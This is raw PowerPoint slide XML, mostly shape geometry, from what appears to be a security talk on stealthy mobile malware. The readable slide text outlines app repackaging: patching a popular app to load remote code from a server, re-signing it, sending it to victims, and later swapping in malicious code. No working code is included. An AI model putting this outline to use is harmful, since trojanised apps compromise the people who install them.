                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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Rounded Rectangle 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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Rounded Rectangle 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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7" name="Picture 8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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89" name="Straight Arrow Connector 88"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3928352" y="3506201"/>
            <a:ext cx="28332" cy="1011168"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4141757" y="3569274"/>
            <a:ext cx="10576" cy="970816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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5" name="Content Placeholder 94"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369740" y="1421680"/>
            <a:ext cx="8423385" cy="1250822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>How can you detect malware code if you don’t see it?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97" name="Line Callout 1 (Border and Accent Bar) 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719769" y="4876915"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val 108009"/>
              <a:gd name="adj3" fmla="val -151244"/>
              <a:gd name="adj4" fmla="val 172254"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8CBDE7"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="8CBDE7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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naive code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>returned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Line Callout 1 (Border and Accent Bar) 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033405" y="2360482"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 61327"/>
              <a:gd name="adj2" fmla="val 109117"/>
              <a:gd name="adj3" fmla="val 165830"/>
              <a:gd name="adj4" fmla="val 151943"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8CBDE7"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="8CBDE7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Get code to execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="110" name="Straight Arrow Connector 109"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4335370" y="3560193"/>
            <a:ext cx="611276" cy="772276"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4523609" y="3479307"/>
            <a:ext cx="708829" cy="817156"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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Arrow Connector 121"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4692364" y="3157299"/>
            <a:ext cx="1776054" cy="907833"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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Arrow Connector 122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748466" y="2950749"/>
            <a:ext cx="1736857" cy="867080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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2" name="Line Callout 1 (Border and Accent Bar) 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409748" y="5795443"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -851"/>
              <a:gd name="adj2" fmla="val 57818"/>
              <a:gd name="adj3" fmla="val -209617"/>
              <a:gd name="adj4" fmla="val 60561"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Line Callout 1 (Border and Accent Bar) 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988421" y="5551026"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -851"/>
              <a:gd name="adj2" fmla="val 50068"/>
              <a:gd name="adj3" fmla="val -210444"/>
              <a:gd name="adj4" fmla="val 17076"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Line Callout 1 (Border and Accent Bar) 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518277" y="4360034"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3285"/>
              <a:gd name="adj2" fmla="val 92261"/>
              <a:gd name="adj3" fmla="val -86363"/>
              <a:gd name="adj4" fmla="val -3590"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1384266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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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25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150"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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2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2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25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750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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2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2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1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25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/>
      <p:bldP spid="95" grpId="0" build="p"/>
      <p:bldP spid="97" grpId="0" animBg="1"/>
      <p:bldP spid="98" grpId="0" animBg="1"/>
      <p:bldP spid="132" grpId="0" animBg="1"/>
      <p:bldP spid="133" grpId="0" animBg="1"/>
      <p:bldP spid="13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Let’s Make It Concrete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599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 Repackaging - The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Choose and download a popular app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decode the app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Patch the decoded app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to load remote code from server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rebuild the patched app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sign the app with newly generated keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send to victim(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At attacker’s will, change remote code to be malicious</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="736403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Live Demo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870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3783366" y="2241323"/>
            <a:ext cx="853157" cy="1319315"/>
            <a:chOff x="6415088" y="4561270"/>
            <a:chExt cx="893731" cy="1382058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6435912" y="4572000"/>
              <a:ext cx="859117" cy="1352176"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY0" fmla="*/ 287618 h 1352176"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 859117"/>
                <a:gd name="connsiteY1" fmla="*/ 1139265 h 1352176"/>
                <a:gd name="connsiteX2" fmla="*/ 85912 w 859117"/>
                <a:gd name="connsiteY2" fmla="*/ 1243853 h 1352176"/>
                <a:gd name="connsiteX3" fmla="*/ 190500 w 859117"/>
                <a:gd name="connsiteY3" fmla="*/ 1299882 h 1352176"/>
                <a:gd name="connsiteX4" fmla="*/ 332441 w 859117"/>
                <a:gd name="connsiteY4" fmla="*/ 1352176 h 1352176"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 859117"/>
                <a:gd name="connsiteY5" fmla="*/ 1333500 h 1352176"/>
                <a:gd name="connsiteX6" fmla="*/ 859117 w 859117"/>
                <a:gd name="connsiteY6" fmla="*/ 1064559 h 1352176"/>
                <a:gd name="connsiteX7" fmla="*/ 847912 w 859117"/>
                <a:gd name="connsiteY7" fmla="*/ 216647 h 1352176"/>
                <a:gd name="connsiteX8" fmla="*/ 481853 w 859117"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1352176"/>
                <a:gd name="connsiteX9" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY9" fmla="*/ 287618 h 1352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59117" h="1352176">
                  <a:moveTo>
                    <a:pt x="3735" y="287618"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1139265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85912" y="1243853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="1299882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332441" y="1352176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859117" y="1064559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847912" y="216647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481853" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3735" y="287618"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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15088" y="4561270"/>
              <a:ext cx="893731" cy="1382058"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Rounded Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550008" y="1943251"/>
            <a:ext cx="1306081" cy="1802744"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 883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Stealthy Malware – Next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What about the CNC Server?  Can it be blacklisted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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524436" y="3334871"/>
            <a:ext cx="2040366" cy="2501153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765360" y="3704203"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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rapezoid 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
